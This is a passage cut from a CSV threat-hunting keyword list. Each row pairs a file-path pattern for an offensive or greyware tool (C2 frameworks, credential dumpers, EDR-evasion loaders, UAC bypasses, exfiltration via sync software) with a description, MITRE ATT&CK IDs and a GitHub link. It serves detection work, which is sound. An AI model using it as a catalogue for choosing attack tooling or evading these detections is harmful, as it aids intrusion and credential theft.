WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*\Fertliser.pdb*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*\Files\ContainersFileUrls.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*\follina.py*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*\FreeFileSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\FreeFileSync\Logs\*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\FreeFileSync_*_Windows_Setup.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\FreeFileSyncPortable_*.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\freeze.go,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*\FtpC2\*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,0,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*\FudgeC2*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*\GetBrowsers.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\Get-SpoolStatus.ps1*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*\GetWebDAVStatus\,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\GetWebDAVStatus_x64*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\glit.exe*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*\glit-cli*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*\gmailC2.exe*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*\gocrack-1.0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*\gocrack-master.*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*\GodFault.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*\Godpotato\*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*\GoFetchLog.log*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*\GoodSync-2*-*.log*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\GoodSync-vsub-Setup.exe*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\go-secdump*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,0,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*\goZulipC2*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,0,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*\GPOddity\*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*\Group3r.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*\Grouper2.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*\GzipB64.exe*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*\HackBrowserData*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,0,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*\Hades.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\hades.exe*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*\hades-main.zip*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*\handlekatz.exe*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*\harvest.cmb*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\hashview.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*\HiddenDesktop\*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*\hijackers\*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*\HijackHunter\*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\hoaxshell\*.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*\HookDetector.csproj*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\HookDetector.exe*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\HostEnum.ps1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,0,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*\HTMLSmuggler\*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,0,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*\huan.exe *,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,0,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*\HWSyscalls.cpp*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\HWSyscalls-Example.*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\hyperion.exe*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\Hypnos.exe*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\Hypnos.sln*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\Hypnos.vcxproj*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\Hypnos-main\*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\icebreaker.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*\IDiagnosticProfileUAC*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,0,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*\iis_controller.py*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*\impacket.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\Implant.exe *,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*\implant.exe *.exe,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\ImplantSSP.exe*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\InactiveDomainAdmins.csv*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*\inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*\injector.ps1 1 *,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation 